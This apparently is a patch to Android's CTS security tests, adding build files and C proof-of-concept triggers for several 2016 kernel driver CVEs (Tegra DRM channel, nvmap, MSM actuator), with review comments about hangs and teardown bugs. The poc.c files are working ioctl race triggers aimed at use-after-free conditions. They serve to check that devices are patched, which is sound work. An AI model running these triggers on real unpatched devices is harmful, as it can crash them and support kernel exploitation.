+#define SIOCGIWNAME     0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM         (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD            13
+#define PRIV_CMD_OID                    15
+#define PRIV_CMD_SW_CTRL                20
+#define PRIV_CMD_WSC_PROBE_REQ          22
+
+enum host1x_class {
+        HOST1X_CLASS_HOST1X = 0x1,
+        HOST1X_CLASS_NVENC = 0x21,
+        HOST1X_CLASS_VI = 0x30,
+        HOST1X_CLASS_ISPA = 0x32,
+        HOST1X_CLASS_ISPB = 0x34,
+        HOST1X_CLASS_GR2D = 0x51,
+        HOST1X_CLASS_GR2D_SB = 0x52,
+        HOST1X_CLASS_VIC = 0x5D,
+        HOST1X_CLASS_GR3D = 0x60,
+        HOST1X_CLASS_NVJPG = 0xC0,
+        HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE                0x40
+#define DRM_COMMAND_END                 0xA0
+#define DRM_TEGRA_OPEN_CHANNEL          0x05
+#define DRM_TEGRA_CLOSE_CHANNEL         0x06
+#define DRM_TEGRA_START_KEEPON		0x10
+
+struct drm_tegra_open_channel {
+        __u32 client;
+        __u32 pad;
+    volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+    volatile __u64 context;
+};
+
+struct drm_tegra_keepon {
+	volatile __u64 context;
+};
+
+#define DRM_IOCTL_BASE                  'd'
+#define DRM_IOWR(nr,type)               _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_START_KEEPON DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_START_KEEPON, struct drm_tegra_keepon)
+
+int fd;
+pthread_t keepon_thread_id[KEEPON_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_keepon keepon_c = { 0 };
+
+static int set_affinity(int num)
+{
+	int ret = 0;
+	cpu_set_t mask;
+	CPU_ZERO(&mask);
+	CPU_SET(num, &mask);
+	ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+	if(ret == -1){
+	}
+	return ret;
+}
+
+static void prepare()
+{
+	open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* keepon_thread(void* no_use)
+{
+	set_affinity(1);
+
+	while(1){
+		ioctl(fd, DRM_IOCTL_TEGRA_START_KEEPON, &keepon_c);
+	}
+}
+
+int main()
+{
+	int i, try_time = TRY_TIMES, ret;
+
+	/* bind_cpu */
+	set_affinity(0);
+
+	/* open dev */
+	fd = open(DEV,O_RDONLY);
+	if(fd == -1){
+		return 0;
+	}
+
+	/* prepare ioctl cmd */
+	prepare();
+
+	/* create keepon thread */
+	for(i = 0; i < KEEPON_THREAD_NUM; i++){
+		ret = pthread_create(keepon_thread_id + i, NULL, keepon_thread, NULL);
+		if(ret){
+			goto out_keepon_thread;
+		}
+	}
+
+	while(try_time){
+		/* open */
+		ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+		if(ret == 0){
+			try_time--;
+			/* set keepon */
+			keepon_c.context = open_c.context;
+			/* set close */
+			close_c.context = open_c.context;
+			usleep(500);
+			ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+		}
+	}
+	
+out_keepon_thread:
+	/* kill keepon thread */
+	for(i = 0; i < KEEPON_THREAD_NUM; i++){
+			pthread_kill(keepon_thread_id[i], SIGKILL);
+	}
+out_dev:
+	close(fd);
+	return 0;
+}
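Review bot: The `while(try_time)` loop in `main` only decrements `try_time` when `DRM_IOCTL_TEGRA_OPEN_CHANNEL` returns 0, so if the node opens but the ioctl keeps failing the loop spins forever without sleeping and the test never finishes. That seems a plausible state on a device where `renderD129` is not the Tegra driver, or where the driver rejects the request. I would bound the attempts independently of successes, for example `int attempts = 10 * TRY_TIMES;` with `while(try_time && attempts--)`. The CVE-2016-6731 and CVE-2016-6735 poc.c files in this commit have the same loop.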
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6735/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6735/Android.mk
new file mode 100644
index 0000000..8935cd6
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6735/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6735
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6735/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6735/poc.c
new file mode 100644
index 0000000..f38f411
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6735/poc.c
@@ -0,0 +1,160 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define KEEPON_THREAD_NUM	900
+#define TRY_TIMES	KEEPON_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME     0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM         (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD            13
+#define PRIV_CMD_OID                    15
+#define PRIV_CMD_SW_CTRL                20
+#define PRIV_CMD_WSC_PROBE_REQ          22
+
+enum host1x_class {
+        HOST1X_CLASS_HOST1X = 0x1,
+        HOST1X_CLASS_NVENC = 0x21,
+        HOST1X_CLASS_VI = 0x30,
+        HOST1X_CLASS_ISPA = 0x32,
+        HOST1X_CLASS_ISPB = 0x34,
+        HOST1X_CLASS_GR2D = 0x51,
+        HOST1X_CLASS_GR2D_SB = 0x52,
+        HOST1X_CLASS_VIC = 0x5D,
+        HOST1X_CLASS_GR3D = 0x60,
+        HOST1X_CLASS_NVJPG = 0xC0,
+        HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE                0x40
+#define DRM_COMMAND_END                 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL          0x05
+#define DRM_TEGRA_CLOSE_CHANNEL         0x06
+#define DRM_TEGRA_STOP_KEEPON		0x11
+
+struct drm_tegra_open_channel {
+        __u32 client;
+        __u32 pad;
+    volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+    volatile __u64 context;
+};
+
+struct drm_tegra_keepon {
+	volatile __u64 context;
+};
+
+#define DRM_IOCTL_BASE                  'd'
+#define DRM_IOWR(nr,type)               _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_STOP_KEEPON DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_STOP_KEEPON, struct drm_tegra_keepon)
+
+int fd;
+pthread_t keepon_thread_id[KEEPON_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_keepon keepon_c = { 0 };
+
+static int set_affinity(int num)
+{
+	int ret = 0;
+	cpu_set_t mask;
+	CPU_ZERO(&mask);
+	CPU_SET(num, &mask);
+	ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+	return ret;
+}
+
+static void prepare()
+{
+	open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* keepon_thread(void* no_use)
+{
+	set_affinity(1);
+
+	while(1){
+		ioctl(fd, DRM_IOCTL_TEGRA_STOP_KEEPON, &keepon_c);
+	}
+}
+
+int main()
+{
+	int i, try_time = TRY_TIMES, ret;
+
+	/* bind_cpu */
+	set_affinity(0);
+
+	/* open dev */
+	fd = open(DEV,O_RDONLY);
+	if(fd == -1){
+		return 0;
+	}
+
+	/* prepare ioctl cmd */
+	prepare();
+
+	/* create keepon thread */
+	for(i = 0; i < KEEPON_THREAD_NUM; i++){
+		ret = pthread_create(keepon_thread_id + i, NULL, keepon_thread, NULL);
+		if(ret){
+			goto out_keepon_thread;
+		}
+	}
+
+	while(try_time){
+		/* open */
+		ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+		if(ret == 0){
+			try_time--;
+			/* set keepon */
+			keepon_c.context = open_c.context;
+			/* set close */
+			close_c.context = open_c.context;
+			usleep(500);
+			ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+		}
+	}
+	
+out_keepon_thread:
+	/* kill keepon thread */
+	for(i = 0; i < KEEPON_THREAD_NUM; i++){
+			pthread_kill(keepon_thread_id[i], SIGKILL);
+	}
+out_dev:
+	close(fd);
+	return 0;
+}
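Review bot: This file has no comment saying what it exercises, and it is almost line-for-line the CVE-2016-6734 source with `DRM_TEGRA_START_KEEPON 0x10` swapped for `DRM_TEGRA_STOP_KEEPON 0x11`. A reader has to diff the two files to see that. I would add a header comment such as `/* CTS check for CVE-2016-6735: DRM_IOCTL_TEGRA_STOP_KEEPON issued while the channel is opened and closed */`. The two tests could also be built from one source, with the ioctl number chosen by a macro, so that fixes to the shared scaffolding land in both.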
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6736/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6736/Android.mk
new file mode 100644
index 0000000..fd7fc21
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6736/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6736
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6736/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6736/poc.c
new file mode 100644
index 0000000..77f4b7a
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6736/poc.c
@@ -0,0 +1,174 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define SUBMIT_THREAD_NUM	900
+#define TRY_TIMES	SUBMIT_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME     0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM         (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD            13
+#define PRIV_CMD_OID                    15
+#define PRIV_CMD_SW_CTRL                20
+#define PRIV_CMD_WSC_PROBE_REQ          22
+
+enum host1x_class {
+        HOST1X_CLASS_HOST1X = 0x1,
+        HOST1X_CLASS_NVENC = 0x21,
+        HOST1X_CLASS_VI = 0x30,
+        HOST1X_CLASS_ISPA = 0x32,
+        HOST1X_CLASS_ISPB = 0x34,
+        HOST1X_CLASS_GR2D = 0x51,
+        HOST1X_CLASS_GR2D_SB = 0x52,
+        HOST1X_CLASS_VIC = 0x5D,
+        HOST1X_CLASS_GR3D = 0x60,
+        HOST1X_CLASS_NVJPG = 0xC0,
+        HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE                0x40
+#define DRM_COMMAND_END                 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL          0x05
+#define DRM_TEGRA_CLOSE_CHANNEL         0x06
+#define DRM_TEGRA_SUBMIT		0x08
+
+struct drm_tegra_open_channel {
+        __u32 client;
+        __u32 pad;
+    volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+    volatile __u64 context;
+};
+
+struct drm_tegra_submit {
+	__u64 context;
+	__u32 num_syncpts;
+	__u32 num_cmdbufs;
+	__u32 num_relocs;
+	__u32 num_waitchks;
+	__u32 waitchk_mask;
+	__u32 timeout;
+	__u64 syncpts;
+	__u64 cmdbufs;
+	__u64 relocs;
+	__u64 waitchks;
+	__u32 fence;		/* Return value */
+	__u32 reserved0;
+	__u64 fences;
+	__u32 reserved1[2];	/* future expansion */
+};
+
+#define DRM_IOCTL_BASE                  'd'
+#define DRM_IOWR(nr,type)               _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+
+int fd;
+pthread_t submit_thread_id[SUBMIT_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_submit submit_c = { 0 };
+
+static int set_affinity(int num)
+{
+	int ret = 0;
+	cpu_set_t mask;
+	CPU_ZERO(&mask);
+	CPU_SET(num, &mask);
+	ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+	return ret;
+}
+
+static void prepare()
+{
+	open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* submit_thread(void* no_use)
+{
+	set_affinity(1);
+
+	while(1){
+		ioctl(fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+	}
+}
+
+int main()
+{
+	int i, try_time = TRY_TIMES, ret;
+
+	/* bind_cpu */
+	set_affinity(0);
+
+	/* open dev */
+	fd = open(DEV,O_RDONLY);
+	if(fd == -1){
+		return 0;
+	}
+
+	/* prepare ioctl cmd */
+	prepare();
+
+	/* create submit thread */
+	for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+		ret = pthread_create(submit_thread_id + i, NULL, submit_thread, NULL);
+		if(ret){
+			goto out_submit_thread;
+		}
+	}
+
+	while(try_time){
+		/* open */
+		ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+		if(ret == 0){
+			try_time--;
+			/* set submit */
+			submit_c.context = open_c.context;
+			/* set close */
+			close_c.context = open_c.context;
+			usleep(500);
+			ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+		}
+	}
+
+out_submit_thread:
+	/* kill submit thread */
+	for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+			pthread_kill(submit_thread_id[i], SIGKILL);
+	}
+out_dev:
+	close(fd);
+	return 0;
+}
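Review bot: The teardown loop under `out_submit_thread:` calls `pthread_kill(submit_thread_id[i], SIGKILL)`, but SIGKILL always terminates the whole process, so the first iteration ends the test by signal and `close(fd)` / `return 0` are never reached. When `pthread_create` fails part-way, the loop also passes the still-zero slots of `submit_thread_id` to `pthread_kill`. A stop flag polled by `submit_thread` (`while (!stop)` in place of `while(1)`), followed by `pthread_join` over only the threads that were created, gives the host-side test a deterministic exit. The `SIOCIWFIRSTPRIV` / `PRIV_CMD_*` defines and the `out_dev:` label are unused here and can be dropped.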
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk
new file mode 100644
index 0000000..bba13f3
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8412
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c
new file mode 100644
index 0000000..d438b40
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c
@@ -0,0 +1,69 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <stdint.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <signal.h>
+
+#define VIDIOC_MSM_ACTUATOR_CFG 0xc0d056c6
+#define MSM_SD_SHUTDOWN 0xc00856dd
+
+int fd;
+
+
+int main() {
+  long i;
+  int pid;
+  pthread_t th[6];
+  int argn[50] = {0};
+
+  fd = open("/dev/v4l-subdev7", 0x0ul );
+
+
+  argn[0] = 7;
+  syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
+
+  pid = fork();
+  if(!pid){
+    argn[0] = 1;
+    while(1){
+      usleep(10);
+      syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
+    }
+  }
+  i = 0;
+  while(1){
+    i++;
+    argn[0] = 7;
+    syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
+
+    usleep(100);
+
+    argn[0] = 0;
+    syscall(__NR_ioctl, fd, MSM_SD_SHUTDOWN, argn, 0, 0, 0);
+
+  }
+
+  close(fd);
+
+  return 0;
+}
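Review bot: The result of `open("/dev/v4l-subdev7", 0x0ul)` in `main` is never checked, so on a device without that node every later `ioctl` runs on fd -1 and both loops spin forever; add `if (fd < 0) return 0;` right after the open. The forked child and the parent both loop on `while(1)`, which makes `close(fd); return 0;` unreachable and leaves the child running if the harness stops only the parent. A bounded parent loop followed by `kill(pid, SIGKILL); waitpid(pid, NULL, 0);` (with `<sys/wait.h>`) would let the binary end on its own. `fork()` returning -1 is not handled, and `th` and `i` are never used.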
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk
new file mode 100644
index 0000000..5ff169b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8424
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c
new file mode 100644
index 0000000..4460b88
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c
@@ -0,0 +1,138 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+	__u32 handle;		/* nvmap handle */
+	__u32 param;		/* size/align/base/heap etc. */
+	unsigned long result;	/* returns requested info*/
+};
+
+struct nvmap_create_handle {
+	union {
+		__u32 id;	/* FromId */
+		__u32 size;	/* CreateHandle */
+		__s32 fd;	/* DmaBufFd or FromFd */
+	};
+	__u32 handle;		/* returns nvmap handle */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE  _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID  _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD  _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE       _IO(NVMAP_IOC_MAGIC, 4)
+
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+
+int open_driver() {
+    char* dev_path = "/dev/nvmap";
+    g_fd = open(dev_path, O_RDWR);
+    if (g_fd < 0) {
+        printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+    } else {
+        printf("[*] open file(%s) succ!\n", dev_path);
+    }
+    return g_fd;
+}
+
+void trigger_nvmap_create() {
+    ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+    //printf("[*] NVMAP_IOC_CREATE, fd(%d), last error = %d\n", g_allocation->handle, errno);
+}
+
+void trigger_nvmap_free() {
+    static int data = 1024;
+    ioctl(g_fd, NVMAP_IOC_FREE, data);
+    //printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+    setpriority(PRIO_PROCESS, gettid(), privi);
+    printf("[*] setpriority(%d) errno = %d\n", privi, errno);
+
+    /* bind process to a CPU*/
+    if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+        printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
+    }
+}
+
+void prepare_data() {
+    void* data = calloc(1, 0x1000);
+
+    g_allocation = (struct nvmap_create_handle*)data;
+    g_allocation->size = 1024;
+
+    mprotect(data, 0x1000, PROT_READ);
+    printf("[*] mprotect, error = %d\n", errno);
+}
+static int init = 0;
+void* race_thread(void* arg) {
+    setup_privi_and_affinity(0, 2);
+
+    int i;
+    while (1) {
+        if (init == 0) {
+            pthread_mutex_lock(&mutex);
+            pthread_cond_wait(&cond, &mutex);
+            pthread_mutex_unlock(&mutex);
+            init = 1;
+        }
+        trigger_nvmap_free();
+    }
+}
+
